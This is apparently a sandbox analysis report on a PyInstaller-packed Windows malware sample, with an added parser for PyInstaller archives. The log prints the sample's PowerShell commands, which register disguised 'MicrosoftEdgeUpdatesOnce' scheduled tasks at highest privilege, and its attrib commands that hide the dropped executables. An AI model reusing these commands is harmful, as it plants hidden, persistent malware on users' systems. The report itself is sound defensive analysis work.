Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE6560
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BEFA08
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF2D30
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BD80A0
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF509C
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BED098
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF5820
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE2800
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE6F98
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE0FB4
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BED718
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE4F50
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BEFA08
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE09A0
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF09B4
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE11C0
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF31CC
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE2C04
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BECC04
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE0BA4
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE8BA0
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE13C4
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF8B68
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BD1B90
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0053F60E
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_005041C5
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0051D1EE
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0053A197
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_005342E0
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_005393D4
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0054F480
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004F95CA
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0051C650
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0053167A
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0052F6F2
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_005177F7
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0052D7FE
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_005367EE
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00527783
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00534940
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00531970
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004F490F
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0051CB3C
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004C3B8C
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0052EC40
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00525C92
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00538CAC
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004FCDC6
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_00519EBC
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6577F6780
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657815D6C
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF65780FA08
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6577F80A0
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF65780D098
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF65781509C
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657802800
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657815820
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657804F50
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657806F98
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657800FB4
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF65780D718
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657801E70
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657814E20
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657806560
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF65780FA08
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657800DB0
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657812D30
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6578013C4
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657802C04
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF65780CC04
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657818B68
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6577F1B90
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657800BA4
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF657808BA0
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6578011C0
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6578131CC
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6578009A0
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: 19_2_00007FF6578109B4
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: String function: 0051B3AC appears 157 times
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: String function: 004FD5C3 appears 31 times
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: String function: 0052B6C3 appears 70 times
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: String function: 0054F3B3 appears 45 times
Source: C:\Users\user\AppData\SystemUpdate.exe | Code function: String function: 00007FF6577F2770 appears 41 times
Source: C:\Users\user\AppData\WinHex.exe | Code function: String function: 00007FF7C5BD2770 appears 41 times
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: String function: 00007FF7A6732770 appears 41 times
Source: LineInst.exe.1.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: MediaSetupUIMgr.dll.11.dr | Static PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
Source: MediaSetupUIMgr.dll.11.dr | Static PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-III ECOFF executable - version 3.-82
Source: MediaSetupUIMgr.dll.11.dr | Static PE information: Resource name: RT_STRING type: basic-16 executable not stripped
Source: MediaSetupUIMgr.dll.11.dr | Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: SetupCore.dll.11.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: SetupCore.dll.11.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: LineInst.exe.1.dr | Static PE information: Resource name: RT_STRING type: GTA2 binary mission script (SCR), Industrial area (bil)
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658685678.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs T1#U52a9#U624b1.0.1.exe
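Two things in the rows above are worth reading together. The OriginalFilename strings (_socket.pyd, _ssl.pyd, _hashlib.pyd, _lzma.pyd, _bz2.pyd, select.pyd, unicodedata.pyd, libssl, vcruntime140.dll) are the version resources of CPython extension modules being unpacked from a PyInstaller onefile archive, which matches the "Found pyInstaller" signature; and the code-function rows for the Desktop sample, C:\Users\user\AppData\WinHex.exe and C:\Users\user\AppData\SystemUpdate.exe list the same relative addresses (the string function at image base + 0x2770 appears 41 times in each, and every function in one list has its counterpart at the same offset in the other two), so the two AppData files are copies of the same PyInstaller stub under new names. The RT_STRING and RT_VERSION "type" rows, by contrast, are file-type guesses run over string-table and version-table bytes and are expected noise for those resource kinds. The parser below is an added example written for this page, not code from the report, from Joe Sandbox or from the sample: it locates the PyInstaller cookie, walks the table of contents and lists the embedded binaries, which is how an analyst confirms the bundled module set without running the file. The cookie and TOC field layout follows PyInstaller's CArchive format as the editor understands it (the same layout that pyinstxtractor reads); build_sample_archive constructs a small stand-in archive so the code runs offline and is not the analysed binary.

```python
import struct
from dataclasses import dataclass

# PyInstaller CArchive layout as appended to the bootloader:
#   stub (bootloader) | entry data ... | TOC | cookie (88 bytes) | optional trailing data
# The cookie is found by searching backwards: data such as an Authenticode signature may follow
# it, and the bootloader itself also contains the magic constant.
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"  # magic, package length, TOC offset, TOC length, Python version, Python DLL
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)  # 88
TOC_FMT = "!IIIIBc"  # entry length, data offset, compressed length, uncompressed length, flag, type
TOC_HEADER = struct.calcsize(TOC_FMT)  # 18, followed by the null-terminated entry name

TYPE_NAMES = {"b": "binary", "z": "pyz archive", "s": "script", "m": "module", "M": "package",
              "x": "data", "o": "option", "d": "dependency"}


@dataclass
class TocEntry:
    name: str
    offset: int  # absolute file offset of the entry's data
    compressed_len: int
    uncompressed_len: int
    compressed: bool
    kind: str


@dataclass
class Archive:
    python_version: str
    python_dll: str
    entries: list[TocEntry]


def parse_pyinstaller(data: bytes) -> Archive:
    """Locate the cookie, then walk the TOC. Raises ValueError on anything inconsistent."""
    cookie_pos = data.rfind(MAGIC)
    if cookie_pos < 0 or cookie_pos + COOKIE_SIZE > len(data):
        raise ValueError("no PyInstaller cookie found")
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, data, cookie_pos)
    base = cookie_pos + COOKIE_SIZE - pkg_len  # the package (data + TOC + cookie) ends with the cookie
    if base < 0 or toc_len < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("cookie offsets fall outside the file")
    # The version field holds e.g. 39 for Python 3.9 and 311 for 3.11.
    major, minor = (pyver // 100, pyver % 100) if pyver >= 100 else (pyver // 10, pyver % 10)
    entries: list[TocEntry] = []
    pos, end = base + toc_off, base + toc_off + toc_len
    while pos + TOC_HEADER <= end:
        entry_len, off, clen, ulen, flag, kind = struct.unpack_from(TOC_FMT, data, pos)
        if entry_len < TOC_HEADER or pos + entry_len > end or base + off + clen > len(data):
            raise ValueError(f"corrupt TOC entry at offset {pos:#x}")
        name = data[pos + TOC_HEADER:pos + entry_len].rstrip(b"\x00").decode("utf-8", "replace")
        code = kind.decode("ascii", "replace")
        entries.append(TocEntry(name, base + off, clen, ulen, bool(flag), TYPE_NAMES.get(code, code)))
        pos += entry_len
    return Archive(f"{major}.{minor}", pylib.rstrip(b"\x00").decode("ascii", "replace"), entries)


def native_extensions(archive: Archive) -> list[str]:
    """Embedded binaries: the entries whose version resources surface as OriginalFilename*.pyd."""
    return sorted(e.name for e in archive.entries if e.kind == "binary")


def build_sample_archive() -> bytes:
    """Constructed stand-in for a onefile executable (not the analysed sample):
    a fake stub that also carries the magic, four entries, the TOC, the cookie, trailing bytes."""
    stub = b"MZ" + b"\x00" * 30 + MAGIC + b"bootloader code that also holds the magic"
    items = [("_socket.pyd", "b", b"MZ" + b"\x90" * 30),
             ("_ssl.pyd", "b", b"MZ" + b"\x90" * 12),
             ("PYZ-00.pyz", "z", b"PYZ\x00" + b"\x00" * 20),
             ("main", "s", b"import socket\n")]
    blob, toc = b"", b""
    for name, code, payload in items:
        name_b = name.encode() + b"\x00"
        toc += struct.pack(TOC_FMT, TOC_HEADER + len(name_b), len(blob), len(payload),
                           len(payload), 0, code.encode()) + name_b
        blob += payload
    pkg_len = len(blob) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(blob), len(toc), 312, b"python312.dll")
    return stub + blob + toc + cookie + b"<trailing signature bytes>"


if __name__ == "__main__":
    arc = parse_pyinstaller(build_sample_archive())
    print(f"Python {arc.python_version} ({arc.python_dll})")
    for e in arc.entries:
        print(f"  {e.kind:12s} {e.name:16s} @ {e.offset:#x} len={e.compressed_len}")
    print("native extensions:", native_extensions(arc))
```

Run against a real onefile binary, read the file into `data` and call parse_pyinstaller on it; a module list that includes _socket, _ssl and _hashlib but none of the usual GUI or scientific packages is the usual starting point for deciding which embedded script to decompile next.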
Source: setupplatform.dll.11.drBinary string: iOpening object %sFailed to get object identifier. Status: %xObjectsObject alias resolves to %sFailed to update object GUID string. Status: %xFailed to get aliased identifier. Status: %xFailed to open key for all objects. Status: %xObject GUID: %sGenerating object GUID.Creating object. Version: %d. Type: 0x%08xFailed to open object's key. Status: %xN/ABcdGetElementDataWithFlags: Failed to open key.Object: %ws Type: %ws Status: %xBcdGetElementDataWithFlags: Failed to open elements key.Object: %ws Status: %xBcdGetElementDataWithFlags: Failed to acquire BCD sync mutant. Status: %xFailed to open key for object's elements. Status: %xSetting element %08xBcdGetElementDataWithFlags: Failed to get registry value.Object: %ws Reg type: %lu Status: %xElementDeleting element %08xFailed to set registry data for element %s. Status: %xFailed to convert data for element %s. Status: %xFailed to open key for element %s. Status: %xFailed to open element %ws key for delete. Status: %xFailed to open key for all object's elements. Status: %xFailed to filter delete element %08x. Status: %xDeleting element %08x blocked by secure boot policy.Failed to get registry value. Status: %xFailed to enumerate subkeys. Status: %xFailed to Enumerate elements from %ws. Status: %xFailed to open object %ws. Status: %xFailed to enumerate subobject elements. Status: %xFailed to enumerate subelements. Status: %xFailed to get the size needed for the registry data. Status: %x\KernelObjects\BcdSyncMutantBcdOpenSystemStore: Failed to acquire BCD sync mutant.Status: %x\Registry\Machine\System\CurrentControlSet\BootConfigurationDataCreating store.Failed to create system store path. Status: %xUnable to create tempory new store key. Status: %xNewStoreRootUnable to create tempory root key. Status: %xFailed to close new store. Store: %ws Status: %xFailed to add new store from file. File: %ws Status: %xFailed to create hive. Store: %ws Status: %xFailed to get system store path. Status: %xDeleting references to object %sFailed to create store. Status: %xFailed to open new system store. Store: %ws Status: %xFailed to adopt new store. File: %ws Status: %xFailed to get system store path to delete. Status: %xDeleting the system store is only supported in WinPEReferencing object: %s.Failed to clean up references to %s. Status: %xStore will be synchronized with firmware.Opening store. Flags: 0x%xBcdOpenStore: Failed to acquire BCD sync Mutant. Store: %wsFlags: 0x%x Status: %x.logBcdOpenStore: Failed to add store from file %ws. StoreFlags: 0x%x Status: %xStore will be accessed with offline registry APIs.Store path: "%s"Failed to open system store. Status: %xBcdForciblyUnloadStore: Failed to acquire BCD sync mutant. Status: %xClosing store. Flags: 0x%xBcdCloseStore: Failed to acquire BCD sync mutant. Status: %xFailed to clear system store flag. Status: %xFailed to export alterations to firmware. Status: %xExporting alterations to firmware.Failed to export unload alterations to firmware. Status: %xExporting f
Source: setupplatform.dll.11.drBinary string: ,`\Registry\Machine\System\CurrentControlSet\Control\MiniNTFailed to delete file. Status: %xMININTSystemStartOptionsPortableOperatingSystem\Registry\Machine\SYSTEM\CurrentControlSet\ControlFailed to query processes. Status: %xFailed to allocate process ID buffer.Failed to open file attributes. Status: %xAttempting to determine owner of file %ws.Failed to query process information for size. Status: %xFailed to open process. Status: %xFound %d processes using this file.No processes are using this file.Process Name [%d]: %wsFailed to query process info. Status: %xFailed to allocate memory for space for process name.ZwFilterBootOptionpartition\ArcName\multi(%d)disk(%d)rdisk(%d)partition(%d)\??\PhysicalDrive%dSystemPartition\Registry\Machine\SYSTEM\CurrentControlSet\Control\Syspart\Device\Harddisk%lu\Partition%lu\EFI\Microsoft\Boot\bootmgfw.efiBiExportStoreAlterationsToEfi failed %xExporting store alterations to efiBiBindEfiNamespaceObjects failed %xBinding EFI namespace objectsBiBindEfiBootManager failed %xBiBuildIdentifierList failed %xBiExportStoreToEfi failed %xExporting store to efiCreated new boot entry 0x%xCreated boot entry 0x%x using cached variableBiBindEfiEntries failed %xBoot entry exists for DontSync with ID 0x%xBiExportEfiBootManager failed: %xBootNextBiExportBcdObjects failed %xBiCreateEfiEntry failed %x\Device\Harddisk%u\Partition%uSyspartGetPhysicalPartitions failed with error code: %x\??\GLOBALROOTSyspartIsSpace failed for %sBCDOBJECT=WINDOWSBiUpdateEfiEntry failed %xBiSpacesUpdatePhysicalDevicePath failed %xBiCreateBootEntry: Could not retrieve BCD Object application description. Status: %xSyspartIsSpace failed for partition path: %sTranslated a DontSync object to ID 0x%xTranslated a DontSync entry with ID 0x%xFailed to add boot entry. Status: %xZwAddBootEntryBiCreateBootEntry: Could not retrieve BCD Object application path. Status: %xBiCreateBootEntry: Could not retrieve BCD Object application device. Status: %xZwDeleteBootEntryDeleting boot entry 0x%xFailed to enumerate boot entries. Status: %xZwEnumerateBootEntriesFailed to query "%ws" variable. Status: %xZwSetSystemEnvironmentValueExZwQuerySystemEnvironmentValueExFailed to delete boot entry 0x%x. Status: %xZwSetBootEntryOrderFailed to modify boot entry 0x%x. Status: %xZwModifyBootEntryFailed to delete "%ws" variable. Status: %xZwTranslateFilePathFailed to set boot options. Status: %xZwSetBootOptionsFailed to set boot entry order. Status: %xFailed to query boot options. Status: %xZwQueryBootOptionsFailed to query boot entry order. Status: %xZwQueryBootEntryOrder%s\Partition%lu\Partition0\ArcName\multi(0)disk(0)rdisk(0)\ArcName\multi(0)disk(0)rdisk(1)multi(%d)disk(%d)rdisk(%d)
Source: classification engineClassification label: mal48.evad.winEXE@174/352@28/6
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67374B0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7A67374B0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005011E1 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_005011E1
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00545070 GetDiskFreeSpaceExW,13_2_00545070
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054CC43 __EH_prolog3,CoCreateInstance,SysFreeString,_wcsicmp,SysFreeString,13_2_0054CC43
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\LineInst.exe
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\SetupLog
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Users\user\AppData\WinHex.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.20
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_03
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\WdsSetupLogInit
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Users\user\AppData\LineInst.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Microsoft.Windows.Websetup
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\OneSettingQueryMutex+WSD+Setup360
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Name, Caption, Architecture, MaxClockSpeed FROM Win32_Processor
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: T1#U52a9#U624b1.0.1.exeVirustotal: Detection: 14%
Source: LineInst.exeString found in binary or memory: %s /InstallFile "%s"
Source: LineInst.exeString found in binary or memory: /Install %s
Source: LineInst.exeString found in binary or memory: /InstallFrom
Source: LineInst.exeString found in binary or memory: /Install
Source: SetupHost.exeString found in binary or memory: /InstallFile
Source: SetupHost.exeString found in binary or memory: /Install
Source: SetupHost.exeString found in binary or memory: /InstallDrivers
Source: SetupHost.exeString found in binary or memory: /InstallLangPacks
Source: SetupHost.exeString found in binary or memory: /InstallPrivates
Source: SetupHost.exeString found in binary or memory: /InstallFOD
Source: SetupHost.exeString found in binary or memory: /LaunchSetup
Source: SetupHost.exeString found in binary or memory: /LaunchSetupWithConfig
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile read: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
Source: unknownProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\LineInst.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\WinHex.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe
Source: unknownProcess created: C:\Users\user\AppData\LineInst.exe C:\Users\user\AppData\Roaming\../LineInst.exe
